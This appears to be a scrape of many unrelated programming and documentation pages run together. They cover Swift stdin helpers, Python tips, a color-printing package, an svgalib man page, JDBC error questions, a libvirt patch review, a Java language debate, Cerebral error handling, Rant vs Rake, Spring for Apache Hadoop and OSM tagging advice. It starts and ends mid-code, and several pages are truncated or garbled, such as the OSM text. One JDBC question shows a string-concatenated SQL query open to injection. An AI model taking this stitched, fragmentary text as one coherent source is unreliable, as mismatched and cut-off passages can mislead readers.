Int.Type != nil) { return getLine().toInt()! } else if (T.self as? [String].Type != nil) { return getLine().componentsSeparatedByCharactersInSet(NSCharacterSet.whitespaceCharacterSet()) } else if (T.self as? [Int].Type != nil) { let words: [String] = readLn() return words.map { $0.toInt()! } } else { return getLine() } } The conditions for ifs are actually a valid Swift code, though they don’t look pretty. The code still doesn’t compile. The problem is that each return statement returns one of these types: String, Int, [String] or [Int], and compiler doesn’t know how to initialize an instance of type T with any of these types. Compiler doesn’t really know anything about T, but it does know that T gives no guarantee to provide init(_: Int) or any other initializer. What you could do next, is to try to come up with a protocol which T would conform to. Pack all these initializers inside the protocol, and then much more; and probably this path of generic functional madness would take you somewhere after all. But look at this from another angle: even if you succeed in making this generic function to compile and work, you effectively have implementations of each and every separate functions sitting right there, each in its own if-clause. So what’s the point then? My personal takeaway from this exercise is: do not overcomplicate things. Just think of a group of N different readLn functions as some single abstract generic function. After all, when you use it in code, that’s exactly how it looks and works. Use Finally, after all this abstract talk, it is time to put these standard input functions to a good use. Let’s start with Solve me first. Here’s the solution in Swift. let a: Int = readLn() // calls readLn() -> Int, because a is of Int type let b: Int = readLn() println(a + b) To test it, make a simple solve-me-first-tc0.txt file with test input. 2 3 Then run this command in the terminal. 
# Mac OS X 10.9+
cat solve-me-first-tc0.txt | xcrun swift solve-me-first.swift

# Mac OS X 10.10+
cat solve-me-first-tc0.txt | swift solve-me-first.swift

As expected, the output is 5 and you've just got your first assignment solved in Swift. While we are at it, let's solve Solve me second. You have to read an array of integers from each line and sum them up. Calculating the sum of all elements in an array is a textbook example of using the reduce method.

let n: Int = readLn()
for _ in 0..<n {
    let ints: [Int] = readLn() // calls readLn() -> [Int]
    let sum = ints.reduce(0, +)
    println(sum)
}

Now, if you are one of the fresh functional programming converts, you might frown at the for-loop. I had the same feeling originally. Reading a lot about the functional approach made me think that any for-loop should be effectively replaced with map, reduce or filter. But is it really so? Swift does have a number of features which are part of the functional programming paradigm, but that doesn't mean that the for-loop is now banned from use. The for-loop is one of the native Swift idioms and does have its own use where appropriate. As an example, check this post and the related discussion on the Apple Developers forum.

Summary

You now have a handy stdin Swift library to get you going with most of the assignments. If you are not a big fan of copy-pasting these functions each time, check out my other posts about HackerRank makefiles and reusing the Swift IO library.
https://mgrebenets.github.io/hackerrank/2015/03/15/hackerrank-in-swift-io
Python is a language known for its simplicity and clean syntax. Python programs usually have fewer lines of code than programs in other languages. Now, let's learn some Python tips and tricks to make your code even more readable and shorter. To download these Python tips and tricks as a PDF, skip to the bottom of this post.

1. Python program to swap two numbers

This is one of the basic programs every newbie programmer learns. The most common way of swapping two variables is by using a third variable. In fact, there are a couple of other ways to swap two numbers.

1. Using a third variable

a = 5
b = 6
c = a
a = b
b = c

2. The Pythonic way

a, b = 5, 6
a, b = b, a

2. Reverse of a string

x = "Hello World"
print(x[::-1])

Output: dlroW olleH

3. Python program to generate a list of numbers up to x

limit = int(input("Enter the limit: "))
l = [x for x in range(limit+1)]
print(l)

This is known as list comprehension.

Output:
Enter the limit: 5
[0, 1, 2, 3, 4, 5]

4. Python assignment expression

The assignment expression (the walrus operator, :=, available from Python 3.8) lets you assign a value inside an expression, for example:

if (n := 10) > 5:
    print(n)

5. Multiply a string

Hey, you can multiply strings in Python.

print("Geekinsta " * 3)

Output: Geekinsta Geekinsta Geekinsta

6. Sort a list based on custom key

Passing a function as the key argument sorts by whatever that function returns, for example by length:

print(sorted(['bb', 'a', 'ccc'], key=len))

7. Check if a string exists in another string

There are several methods to do this.

x = "Hi from Geekinsta"
substr = "Geekinsta"

# Method 1
if substr in x:
    print("Exists")

# Method 2
if x.find(substr) >= 0:
    print("Exists")

# Method 3
if x.__contains__(substr):
    print("Exists")

8. Shuffle the items of a list

How do you usually shuffle the items in a list? Most Python beginners use a loop to iterate over the list and shuffle the items. But Python has an inbuilt method to shuffle list items. To use this method, we should first import the random module.

from random import shuffle
l = [1, 2, 3]
shuffle(l)
print(l)

You will get different outputs each time you run the code.

9. Create string from a list

With Python's join method, we can easily convert the items of a list to a string.
l = ['Join', 'this', 'string']
print(str.join(' ', l))

10. Pass list items as arguments

In Python, you can pass the elements of a list as individual parameters without specifying them manually by index, using the * operator. This is also known as unpacking.

l = [5, 6]

def sum(x, y):
    print(x + y)

sum(*l)

11. Flatten a list of lists

Usually, we flatten a list of lists using a couple of nested for loops. Although this method works fine, it makes our code larger. So, here's a shorter method to flatten a list using the itertools module.

import itertools
a = [[1, 2], [3, 4]]
b = list(itertools.chain.from_iterable(a))
print(b)

12. Interchanging keys and values of a Dictionary

Python allows you to easily swap the keys and values of a dictionary using the same syntax we use for dictionary comprehension. Here's an example.

d = {1: 'One', 2: 'Two', 3: 'Three'}
di = {v: k for k, v in d.items()}
print(di)

13. Using two lists in a loop

We normally use the range() function or an iterable object to create a for loop. We can also create a for loop over multiple iterable objects using the zip() function.

keys = ['Name', 'age']
values = ['John', '22']
for i, j in zip(keys, values):
    print(f'{i}: {j}')

14. Create a dictionary from two lists

We can combine the elements of two lists as key-value pairs to form a dictionary. Here's an example.

keys = ['Name', 'age']
values = ['John', '22']
d = {k: v for k, v in zip(keys, values)}
print(d)

15. Pass dictionary items as a parameter

The key-value pairs of a dictionary can be directly passed as named parameters to any function, in the same way we passed a list before.

d = {'age': 25, 'name': 'Jane'}

def showdata(name, age):
    print(f'{name} is {age} years old')

showdata(**d)

Download Python Tips and Tricks PDF

We'll be regularly updating this article with more such tips and tricks to make your code shorter and more readable.
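As a quick self-check, here is a runnable recap of a few of the tips above (the Pythonic swap, slicing reversal, list comprehension, and building a dict with zip); nothing in it goes beyond what the article already showed:

```python
# Tip 1: the Pythonic swap
a, b = 5, 6
a, b = b, a
assert (a, b) == (6, 5)

# Tip 2: reverse a string with slicing
assert "Hello World"[::-1] == "dlroW olleH"

# Tip 3: list comprehension up to a limit
assert [x for x in range(6)] == [0, 1, 2, 3, 4, 5]

# Tip 14: build a dict from two lists with zip
keys = ['Name', 'age']
values = ['John', '22']
assert {k: v for k, v in zip(keys, values)} == {'Name': 'John', 'age': '22'}

print("all tips verified")
```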
https://www.geekinsta.com/python-tips-and-tricks/
print in color easily!

Project description

Orchid66: print colorful stuff nicely. Yeah, just print colorful stuff nicely.

Note: currently only supports Linux.

example:

from orchid66 import printn

printn("this is in *red*, and this is in *blue*", ('red', 'blue'))
printn("I like *green* && *blue*", ('green', 'blue'))

green_in_blue = ('green', 'blue') # notice tuple in tuple in second parameter
printn("I like *green in blue*", (green_in_blue,))

# with tuples
red = (255, 0, 0)
blue = (50, 50, 255)
green = (50, 255, 50)
printn('this word is in *red*, and this is in *blue*', (red, blue))

installation

through pypi

pip install orchid66

by cloning the repository

- clone this repository
- change the current directory into this repository
- execute pip install .

supported colors

all X11 colors

orchid66's mini language

- text between * is rendered as colored, except when preceded by a &
- &* refers to a single * that is rendered
- && refers to a single & that is rendered

Source Distribution: orchid66-1.1.6.tar.gz (9.9 kB)
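Colored terminal output on Linux is normally produced with ANSI escape sequences. As a rough, library-free illustration of what 24-bit ("truecolor") printing looks like (this is an assumption about the general mechanism, not taken from orchid66's docs, and the `colorize` helper below is hypothetical):

```python
def colorize(text, rgb):
    """Wrap text in a 24-bit ANSI foreground color escape (assumed mechanism)."""
    r, g, b = rgb
    return "\033[38;2;%d;%d;%dm%s\033[0m" % (r, g, b, text)

print(colorize("this is red", (255, 0, 0)))
```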
https://pypi.org/project/orchid66/
gl_bcircle man page

gl_bcircle — draw a filled or unfilled Bresenham circle

Synopsis

#include <vgagl.h>

void gl_bcircle(int x, int y, int r, int c, int fill);

Description

Draw a Bresenham circle of radius r in color c, centered at (x, y). Fill should be 0 for a hollow circle, or any other value for a solid color. This function differs from gl_circle(3) and gl_fillcircle(3) in that it looks good in 320 x 200 screen modes. The modified algorithm was provided by Chris Atenasio <chris@svgalib.org>, and is based upon Bresenham's formula. Note that the "circle" is technically an ellipse, and is actually wider than it is tall. Therefore, r is equal to the circle's height, but is less than its width. This distortion is necessary to accommodate the 8:5 aspect ratio (e.g., 320 x 200). I don't recommend using this function in standard 4:3 screen modes (e.g., 640 x 480 and higher). Furthermore, care must be taken so that a circle drawn with this function isn't copied to a screen with a different aspect ratio. Otherwise, the result may be undesirable.

See Also

svgalib(7), vgagl(7), svgalib.conf(5), threedkit(7), testgl(1), plane(1), wrapdemo(1), gl_circle(3), gl_clearscreen(3), gl_colorfont(3), gl_disableclipping(3), gl_enableclipping(3), gl_fillbox(3), gl_fillcircle(3), gl_hline(3), gl_line(3), gl_setclippingwindow(3), gl_setpalette(3), gl_setpalettecolor(3), gl_setpalettecolors(3), gl_setpixel(3), gl_setpixelrgb(3), gl_setrgbpalette(3), gl_setwritemode(3).

Author

This manual page was written by Jay Link <jlink@svgalib.org>.
https://www.mankier.com/3/gl_bcircle
/** * */ package ORM; import java.sql.Connection; import java.sql.DriverManager; import java.sql.SQLException; /** * @author Gwilym * @version 0.0 */ public class DatabaseConnection { private String userName=""; private String password=""; private String host=""; Connection ... I'm getting a strange error from the SQL Server JDBC driver. It is telling me that a column name is invalid even though the column is present, correctly named and the ... When using ANT to build my Java application I keep getting this error. I have tried multiple times to use SQLJDBC.JAR and SQLJDBC4.JAR but continually receive this error message. I am ... I'm getting the following exception in my log when I try to perform an XA transaction: javax.transaction.xa.XAException: com.microsoft.sqlserver.jdbc_SQLServerException: failed to create the XA control connection. Error: "The EXECUTE permission was ... I have this error/exception- SQL Exception: com.microsoft.sqlserver.jdbc.SQLServerException: The TCP/IP connection to the host localhost, port 1433 has failed. Error: "connect timed out. Verify the connection properties, check that an instance of SQL ... import java.sql.*; import java.awt.event.*; import javax.swing.*; import java.awt.*; class student extends JFrame implements ActionListener { JTextField tf,tf1,tf3,tf4,tf5,tf6,tf7,tf2,tf8; Connection conn = null; PreparedStatement ins,del,upd,sel; student() throws Exception { super("STUDENT MANAGEMENT"); String userName = "root"; ... package CrimeFile; import com.sun.rowset.JdbcRowSetImpl; import java.sql.SQLException; import java.util.logging.Level; import java.util.logging.Logger; import javax.sql.rowset.JdbcRowSet; /** * * @author singgum3b */ public class test { /** * @param args the command line arguments ... 
I am getting this error when I am trying to index a table from a database on SQL Server: SEVERE: Exception while processing: APPLICATION document : SolrInputDocument[{}]:org.apache.solr.handler.dataimport.DataImportHandlerException: Unable to execute query: select APP_ID ... I use the callable interface of Java and try to read the output variable value of a stored procedure written in SQL Server. Stored procedure: callable CREATE PROCEDURE [Get_Project_Name_Test] ... I have reviewed my question and made some changes. public class SQLCONC { public static Connection Conn; public static Connection getConnection() ... Hi, I use JDBC/SQLServer 2000 with the latest version of the MS driver. My insert starts a trigger. My insert is in a batch, and I use executeBatch. The insert is not executed (because of the bad trigger). My problem is that: no exception is thrown, and the returned int[] contains only '1'. Do you have any information about this? Thanks. Hi, I have a stored procedure in SQL Server 7 which takes a parameter and executes the query. It looks like BEGIN EXEC('DELETE FROM #TMPTable WHERE NEDevice NOT IN ('+@DeviceFilter+')') END and the DeviceFilter value will be passed as 'value1','value2',... But if the length of that parameter exceeds 128, it throws an exception saying the identifier is too long. ... I am using the following query: SELECT Fax.* FROM Fax INNER JOIN FaxAccess ON Fax.DocumentNumber = FaxAccess.DocumentNumber WHERE FaxTypeId = 2 AND isPublic = 0 AND (FaxAccess.UserAccess LIKE '\Seattle\Police\Detective%' ) UNION SELECT Fax.* FROM FAX WHERE FaxTypeId = 2 AND Fax.isPublic = 1 and both queries return the same columns independently, but I get the following error when I execute the queries with a union ...
- is the server where you think it is (have you specified the right host) - is there a firewall anywhere that is eating this (previously suggested but check for firewall problems on all of the client, the server and any network device in between) - is SQL Server set up ... I would really appriciate if someone can help me fix my problem. I have 2 instances of Tomcat running. One is a Tomcat 5.5.12 and the others a 5.5.15. I have a JDBC application which queries a SQLSERVER 2000 and writes the tables to an OracleDataSource. I have both the datasources in my '\conf\Catalina\localhost\"webapp".xml file.The 5.5.15 instance runs fine and does ... Hi, I've installed sql server 2000 in my local machine and I'm trying to connect thro' sql server 2005 jdbc from my application. I've installed quantum db plugin for myeclipse which is a database tool and i was able to connect to the sql server 2000 and could pull my tables. I use the same configuration (driver name, connection url,etc) and ... A data that is passed in where clause in SQL has a quote as: my'value Not using prepared statement. String sql = "Select * from myTable Where colValue = '" + val + "'"; val passed in from a command line. Value of val variavle has a quote as my'value. Exception is thrown when quote is encountered in the value of ... public static void main(String[] args) { connection = getConnection(); // this one is fine Connection connection2 = getConnection(); // at this line gives error } public static Connection getConnection() { Connection connection3 = null; try { Class.forName(driver).newInstance(); connection3 = DriverManager.getConnection(url, userName, password); System.out.println("Connected to the database at :" + new Date()); } catch (Exception e) { e.printStackTrace(); } return connection3; } ... Hi All, I have created a system DSN using ODBC administrator to connect to SQL Server 2008 database using SQL Server Native Client 10.0. 
My system configuration is: Windows Server 2008 R2 64 bit, SQL Server 2008 64 bit, JDK 6.0.18 64 bit. Now when I try to connect to the database using this DSN and the JDBC-ODBC bridge, I get the ... Hi Friends, here my problem is "java.sql.SQLException: [Microsoft][SQLServer JDBC Driver]System Exception: Connection reset by peer: socket write error". I'm receiving the above error from my application, i.e. my application is communicating with SQL Server continuously, and there is no request for a long time from my application to SqlServer and if I try any request to SQL Server. im ...
http://www.java2s.com/Questions_And_Answers/Java-Database/SQLserver/exception.htm
On Mon, Dec 05, 2011 at 10:38:49AM -0700, Eric Blake wrote: > Over time, Fedora and RHEL RPMs have often backported upstream > patches that touched configure.ac and/or Makefile.am; this > necessitates rerunning the autotools for the patch to be effective. > Making this part of the spec file will make it easier for future > backports to pull patches without thinking about this issue. > > * libvirt.spec.in (BuildRequires): Add autotools. > (%build): Use them before configure. > --- > libvirt.spec.in | 4 ++++ > 1 files changed, 4 insertions(+), 0 deletions(-) > > diff --git a/libvirt.spec.in b/libvirt.spec.in > index 06c949b..462421a 100644 > --- a/libvirt.spec.in > +++ b/libvirt.spec.in > @@ -334,6 +334,9 @@ Requires: libcgroup > %endif > > # All build-time requirements > +BuildRequires: autoconf > +BuildRequires: automake > +BuildRequires: libtool > BuildRequires: python-devel > %if %{with_systemd} > BuildRequires: systemd-units > @@ -721,6 +724,7 @@ of recent versions of Linux (and other OSes). > %define init_scripts --with-init_script=redhat > %endif > > +autoreconf -if > %configure %{?_without_xen} \ > %{?_without_qemu} \ > %{?_without_openvz} \ NACK, we really shouldn't do this by default IMHO - regenerating autotools has not always been foolproof when newer autotools are released. If we want to include this for help of downstream, then it should be protected by a conditional statement, so it is off by default and you can set %define enable_autoconf 1 at the top of the spec to turn it on. Regards, Daniel -- |: -o- :| |: -o- :| |: -o- :| |: -o- :|
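A sketch of the conditional approach Daniel suggests might look like this in the spec file (hypothetical fragment; the macro name and default follow his wording, but the exact layout is up to the packager):

```
# Off by default; downstream builds that backport configure.ac/Makefile.am
# patches can flip this on.
%define enable_autoconf 0

%build
%if %{enable_autoconf}
autoreconf -if
%endif
%configure %{?_without_xen} \
           ...
```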
https://www.redhat.com/archives/libvir-list/2011-December/msg00230.html
Richard Golebiowski wrote:20 years ago they were saying that programmers would not be needed soon. Pat Farrell wrote:Where is the creativity? Where is the leap in productivity? Gregg Bolinger wrote:Here's my biggest problem with Java and teaching it to someone new to programming: public class HelloWorld { public static void main(String[] args) { System.out.println("Hello, World"); } } David Newton wrote:Nothing you have said addresses anything I said: I never said it wasn't used, I never said it wasn't less complicated than C++ (in fact I said it *was* less complicated), or that it had less scope. I also said it was fast--but it used to be as slow or slower than Smalltalk. I have very specific issues with Java--if you want to address those, okay, but stick to things I actually said. Oh! i can't accept that . Depends on what you mean: verbosity is most certainly one type of complexity. The more there is to take in the more cognitive overhead there is. The more the problem is being obscured by the solution the more cognitive overhead there is. One of Java's greatest weaknesses (to me) is that every solution looks like Java--not like the problem I'm trying to solve. This is somewhat alleviated by static imports, foreach, etc. but remains wrecked by reflection and lack of first-class functions. Workarounds require enough additional code to make the tradeoff questionable. Deepak Bala wrote:[One could argue that writing many small methods makes the code more verbose. David Newton wrote: Deepak Bala wrote:[One could argue that writing many small methods makes the code more verbose. But it couldn't be argued very well, since the number of moving parts is nearly identical. Arun Giridharan wrote:Oh! i can't accept that . Jesper Young wrote: Java the language is not very complicated at all, and it's much simpler than C++ (which does have a lot of intricate pitfalls). I don't see the need for a language that's "simpler" than Java. 
If it's not the language itself he's talking about, but the ecosystem around it (with the thousands of libraries and frameworks) - that's what I regard one of the greatest strengths of Java: you can get a library or framework for anything, and you often have choice between multiple implementations. If Go would ever become popular, then it will grow as well, new language features will be added and lots of people will be writing libraries and frameworks in it, and after a while it will be just as "complex" as Java. I see that I'm not the only one with this idea: David Newton wrote: Arun Giridharan wrote:Oh! i can't accept that . Accept what? That Java isn't a good language for organic exploration?! If so, you'll need to back that up with something other than simple disagreement, and figure out a way to refute common sense and experience. Java is a *terrible* language for exploration, because it takes too long to explore, and there's too much ceremony. In a language with a REPL people can just *begin*. With Java there's *way* more to it just to get *started*, let alone doing anything useful. Try this experiment: drop a kid in front of a computer and tell him to start having fun in a Java environment. Now tell him to start having fun with, say, Logo. Now go off and read the studies of using Logo in the classroom and check out what *kids* are doing, then tell me how much luck they'd have doing the same thing in Java. Then perhaps you'll understand what I'm trying to say. Ever see Why's Ruby-based interactive learning environment? That's just Ruby. In order to even get close with Java you need to go with something like BlueJ, and even that is targeted at high school and college age students. Java is neither designed, nor appropriate, for introductory programming instruction. Nor advanced programming instruction, because you simply cannot *teach* some concepts with it that you can with many other higher-level languages. 
Arun Giridharan wrote:IF you have better imagination ..... please let us know ! !
http://www.coderanch.com/forums/posts/list/40/504671
I am currently working with the web2py framework and creating a similar website as to (it's just a uni project). One of the functions I need to write is the searchFlights function, where I have created a custom HTML form which allows users to select dates, location, etc. The HTML is meant to send this information back to the function defined in the controller, where it then queries the database and returns the flight results. The code for querying the database is:

def show():
    receivedFlights = request.vars
    return dict(txt1=recievedflights, flights=db().select(db.Flight.request))

I am currently getting an error when I try to search the flights. The error is: cannot concatenate 'str' and 'NoneType' objects
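That exception typically means a None crept into a string concatenation somewhere; web2py's request.vars behaves like a dict that yields None for missing keys instead of raising. A minimal reproduction outside web2py, with an illustrative stand-in class (not web2py's actual implementation):

```python
class Vars(dict):
    """Mimics request.vars: missing keys give None rather than KeyError."""
    def __getattr__(self, name):
        # Called only when normal attribute lookup fails, so dict methods
        # like .get still resolve normally.
        return self.get(name)  # None when the form field was never submitted

request_vars = Vars({'destination': 'SYD'})

# Field present: concatenation works
assert "To: " + request_vars.destination == "To: SYD"

# Field missing (e.g. a typo in the form field name): TypeError,
# just like the error message in the question
try:
    "Date: " + request_vars.depart_date
except TypeError as e:
    print("reproduced:", e)
```

Note that the controller assigns receivedFlights but returns recievedflights; a mismatched name like that is exactly the kind of thing that leaves a None (or NameError) in the template.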
http://www.dreamincode.net/forums/topic/307348-typeerror-cannot-concatenate-str-and-nonetype-objects/
Handling complex asynchronous flows is a challenging task for error handling. If things are not done correctly, errors can be swallowed and you will have a hard time figuring out why your application does not work. Error handling in Cerebral signals is done for you. Wherever you throw an error, it will be caught correctly and thrown to the console unless you have explicitly said you want to handle it. And even when you do explicitly handle it, Cerebral will still show the error in the debugger as a caught error, meaning you can never go wrong. The action in question is highlighted red; you will see the error message, the related code, and even what executed related to you catching the error. To catch an error from a signal you can define it with the signal definition:

someModule.js

export default {
  state: {},
  signals: {
    // Define the signal as an object
    somethingHappened: {
      signal: someSequence,
      catch: new Map([
        [FirebaseProviderError, someErrorHandlingSequence]
      ])
    }
  }
}

If you are not familiar with the Map JavaScript API, you can read more here. We basically tell the signal that we are interested in any errors thrown by the Firebase Provider. Then we point to the sequence of actions we want to handle it. An error will be passed in to the sequence of actions handling the error:

{
  foo: 'bar', // already on payload
  error: {
    name: 'FirebaseProviderError',
    message: 'Could not connect',
    stack: '...'
  }
}

In most applications error handling can be handled at a global level.
That means you define your signals as normal and instead define catch handlers on the controller itself:

import {Controller} from 'cerebral'
import {
  FirebaseProviderAuthenticationError,
  FirebaseProviderError
} from '@cerebral/firebase'
import { HttpProviderError } from '@cerebral/http'

const controller = Controller({
  modules: {},
  catch: new Map([
    [FirebaseProviderAuthenticationError, someErrorSequence],
    [FirebaseProviderError, someErrorSequence],
    [HttpProviderError, someErrorSequence]
  ])
})

JavaScript has a base error class, Error. When you create your own error types it makes sense to extend Error. This is only recently supported in browsers, but you can use es6-error to make sure extending errors works correctly.

import ES6Error from 'es6-error'

class AppError extends ES6Error {
  constructor(message) {
    super(message)
    this.name = 'AppError'
  }
}

This allows you to create more specific errors by subclassing:

class AuthError extends AppError {
  constructor(message, code) {
    super(message)
    this.name = 'AuthError'
    this.code = code
  }
  // By adding a custom "toJSON" method you decide
  // how the error will be shown when passed to the
  // debugger and your catch handler
  toJSON () {
    return {
      name: this.name,
      message: this.message,
      code: this.code,
      stack: this.stack
    }
  }
}

To play around with modules have a look at this BIN.
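The same pattern - a base application error, more specific subclasses, and a custom serialized form - translates to most languages. A rough Python analogue, with all names invented for illustration:

```python
class AppError(Exception):
    """Base class for application-specific errors."""
    def __init__(self, message):
        super().__init__(message)
        self.name = type(self).__name__
        self.message = message

class AuthError(AppError):
    """More specific error carrying an extra code field."""
    def __init__(self, message, code):
        super().__init__(message)
        self.code = code

    def to_json(self):
        # Decide how the error is shown when serialized,
        # mirroring the toJSON method in the JavaScript example.
        return {"name": self.name, "message": self.message, "code": self.code}

try:
    raise AuthError("Could not connect", 401)
except AppError as err:  # catching the base class also catches subclasses
    payload = err.to_json()
```

As with Cerebral's catch map, handlers registered for the base class will also match every subclass.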
http://cerebraljs.com/docs/introduction/errors.html
Rant vs. Rake

Since many people (especially Ruby programmers) that know Rake ask for a Rake/Rant comparison, I'll spend a few paragraphs on this topic. This comparison is for Rant 0.4.8 and Rake 0.6.2. If not stated otherwise, this document assumes a standard Ruby 1.8/1.9 installation without additional libraries (except for Rant and Rake).

Feature comparison

Generally speaking, Rant has all major features of Rake and more. In particular, the following major Rant features aren't available for Rake:

- Optional use of MD5 checksums instead of timestamps. To enable it, one import statement at the top of the Rantfile is enough: import "md5"
- Easy and portable tgz/zip file creation on Linux/Mac OS X/Windows (and probably most other platforms where Ruby runs). No additional libraries necessary!
- Create a script, tailored to the needs of a project, which can be used instead of a Rant installation => distribute this script with your project, and users and other developers don't need a Rant installation. Try the rant-import command: % rant-import --auto make.rb rant-import reads the Rantfile in the current directory, determines what code of the Rant distribution (and custom imports) is needed, and writes a script that supports all required Rant features and depends only on a standard Ruby (1.8.0 or newer) installation to the file make.rb. Users and other developers don't need a Rant installation anymore. Instead of typing: % rant foo they can type: % ruby make.rb foo
- It is possible to split up the build specification into multiple files in different directories (=> no such thing as "recursive make" necessary).
- Dependency checking for C/C++ source files (integrated makedepend replacement).
- The --force-run (-a) option forces the rebuild of a target and all its dependencies. E.g.: % rant -a foo Let's say foo depends on foo.o and util.o. Then the above command will cause a rebuild of foo.o, util.o and foo, no matter whether Rant considers these files up to date or not.
- Tasks with command change recognition. Example code: import "command" var :CFLAGS => "-g -O2" # can be overridden from commandline gen Command, "foo", ["foo.o", "util.o"], "cc $[CFLAGS] -o $(name) $(prerequisites)" The last two lines tell Rant, that the file foo depends on the files foo.o and util.o and that foo can be built by running the command in the last line ("cc …") in a subshell. If at least one of the following three conditions is met, foo will be rebuilt: - foo doesn’t exist. - foo.o or util.o changed since the last build of foo. - The command (most probably CFLAGS) changed since the last build of foo. - Dependency checking for C/C++ source files import "c/dependencies" # save dependencies between source/header files in the file # "cdeps"; search for include files in "." and "include" dirs gen C::Dependencies, "cdeps" :search => [".", "include"] # load dependency information when Rant looks at a C file gen Action, /\.(c|h)/ do source "cdeps" end Some other goodies: The make method, the SubFile and AutoClean tasks, special variables and more. Most of this is documented in doc/advanced.rdoc Internals - Rake defines many methods (task, file, desc, FileUtils methods, etc.) in the Object class (i.e. accessible from each line of Ruby code) which can get problematic at least if you want to use Rake as a library. Rant solves this problem by evaluating Rantfiles in a special context (with instance_eval). - Rake uses global variables and class/class instance variables to store state (tasks, etc.). The effect of this is, that you can have only one Rake application per Ruby interpreter (process) at a time. Rant stores application state in a class instance. It is possible to instantiate as many "Rant applications" at the same time as needed. On the other hand, there is currently no public and documented interface to do so (but it will come at least with Rant 1.0.0).
http://make.rubyforge.org/files/doc/rant_vs_rake_rdoc.html
#include <dri_interface.h>

Screen dependent methods. This structure is initialized during the __DRIdisplayRec::createScreen call.

- Functions associated with MESA_allocate_memory.
- Method to create the private DRI context data and initialize the context dependent methods.
- Method to create the private DRI drawable data and initialize the drawable dependent methods.
- Method to destroy the private DRI screen data.
- Method to return a pointer to the DRI drawable data.
- Get the number of vertical refreshes since some point in time before this function was first called (i.e., system start up).
- Opaque pointer to private per screen direct rendering data. NULL if direct rendering is not supported on this screen. Never dereferenced in libGL.
http://www.dpi.inpe.br/terralib/html/v410/struct_____d_r_iscreen_rec.html
Spring for Apache Hadoop 2.1 Released

It was about six months ago that we started work on the 2.1 version of Spring for Apache Hadoop. We are now pleased to announce the general availability of version 2.1.0.

Beginning with the Spring for Apache Hadoop 2.1 version, we now only support Hadoop 2.0 APIs and no longer provide backwards compatibility with older Hadoop v1 distributions. If you need support for older Hadoop versions please use the 2.0.4 or 1.1.0 versions of Spring for Apache Hadoop.

The main new features for the 2.1 version are:

Configuration and Boot support:

- New @Configuration changes and improvements to the Boot auto configuration features. A good example of this support can be seen in the boot-fsshell DemoApplication example app

@SpringBootApplication
public class DemoApplication implements CommandLineRunner {

    @Autowired
    private FsShell shell;

    @Override
    public void run(String... args) {
        for (FileStatus s : shell.lsr("/tmp")) {
            System.out.println("> " + s.getPath());
        }
    }

    public static void main(String[] args) {
        SpringApplication.run(DemoApplication.class, args);
    }
}

For the full sample, go to

Store:

- Added support for append mode in the HDFS store writers.
- The Kite SDK dataset support updated to 0.17.0. This means there are some changes to the API. The use of a namespace in addition to the basePath is now mandatory. The DatasetTemplate now also uses ViewCallbacks instead of a partition expression for querying the data.

YARN:

- Support for container grouping and clustering in Spring YARN, which brings functionality for running multiple container types within a single YARN application.
- A new REST API for submitted apps and an improved application model with new client side commands and a command line shell.
- To see examples of these features look at the yarn-store-groups example app or at the Spring XD implementation for running on YARN.

We continue to update support for the latest Hadoop versions.
We now provide "flavored" versions for the following distributions:

- Apache Hadoop 2.4.1 (2.1.0.RELEASE-hadoop24)
- Apache Hadoop 2.5.2 (2.1.0.RELEASE-hadoop25)
- Apache Hadoop 2.6.0 (2.1.0.RELEASE)
- Pivotal HD 2.1 (2.1.0.RELEASE-phd21)
- Cloudera CDH5 5.3.0 (2.1.0.RELEASE-cdh5)
- Hortonworks HDP 2.2 (2.1.0.RELEASE-hdp22)

The default distribution version is now Apache Hadoop 2.6.0.

Going forward

With the Hadoop ecosystem moving at a rapid pace, we hope that more frequent releases will help us keep up. For the next version we are planning on adding the following:

- Better Java Configuration support.
- Add better support for Hiveserver2 including a batch tasklet.
- Basic support for a batch tasklet to run Spark apps.
- Better boot support throughout the different modules.
- Improved security support (i.e. the YARN Boot CLI interaction, etc).
- Enhancements to have seamless integration with spring-cloud components (i.e. spring-cloud-cluster).

Please provide feedback and feature requests via JIRA issues or GitHub issues (see project page for links). The project page is at -
http://spring.io/blog/2015/02/09/spring-for-apache-hadoop-2-1-released
Any tags you like

Note: Many general interest features are already on Map Features and it is recommended to use the tagging given there. Otherwise other users might eventually convert your contributions to fit that scheme.

Contents

So you've followed good practice and searched the wiki. You want to gather feedback from fellow mappers, including people from different regions. E.g., adding the location of a WLAN hotspot's base station is considered acceptable, but tagging many nodes around it with the perceived signal levels is unwanted. Such information is better stored in a separate service. Please consider community consensus documented on the Good practice page regarding verifiability. Do not map historic, temporary or hypothetical features, opinionated data like ratings, or legislation.

Depending on whether what you want fits into some already defined category, you may define a new main key, a new value for an existing key, a new property modifying one or more key/value combinations, or a new method of refinement. If in doubt whether to define something entirely new or use some existing combination with new properties or refinements, consider:

- new properties should not modify established features in ways that would contradict common-sense expectations of them

The strings chosen for the key part have some conventional forms:

- Ideally, a key is one word, in lowercase, using British English if possible.
- Relatively uncommon: like pattern 2, but done in a generative manner where sub-parts refer to other defined keys. This is almost meta-tagging. Almost.
  - source:name=* - the source for the name tag is ...
  - source:ref=* - the source for the ref tag is ...

Syntactic conventions for new values

The format and conventions depend on whether the tag represents a feature or a property.

- A tag can represent either a separate feature (like highway) or a property of a feature (like width).
- Properties can have a large number of possible values, or can be numeric (e.g. width=2).
- Features often take values which further refine the category of map feature (e.g. highway=motorway).
- For feature tags, the value follows formatting conventions similar to those used for keys:
- Ideally, the value of a feature tag is one word, in lowercase, using British English if possible.
- When that can't be the case, the value of a feature tag should be one concept, whose words are underscore_separated.
- Sometimes the semicolon ";" is interpreted as a multi-value separator - see Semi-colon value separator.

Refinement and namespaces

There's a common pattern of iterative refinement in use in many tagging schemes, which has the advantage that the scheme can grow over time to be more and more descriptive whilst still being backwards-compatible. Beware of conflicts with other tagging schemes when following this pattern. Refinement can also be done by means of namespaces.

Characters

You can use any Unicode characters (UTF-8) as you like. In practice, most keys (such as highway) and classification values (such as trunk_link) use lower-case ASCII, but values may use any characters you can think of. Avoid whitespace at the beginning and end of values.

- Just Map
- Good Practice
- Proposal process
- How to invent tags by Jochen Topf
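The key conventions above (lowercase words, underscores inside words, optional colon-separated namespace parts such as source:name) can be captured in a quick validation sketch. The regular expression here is my own reading of those conventions, not an official OSM rule:

```python
import re

# One lowercase word (underscores allowed inside), optionally followed by
# colon-separated namespace parts of the same shape, e.g. "source:name".
KEY_PATTERN = re.compile(r"^[a-z][a-z_]*(?::[a-z][a-z_]*)*$")

def looks_like_conventional_key(key):
    """Return True if the key matches the usual formatting conventions."""
    return bool(KEY_PATTERN.match(key))

for key in ("highway", "source:name", "Maxspeed", "width "):
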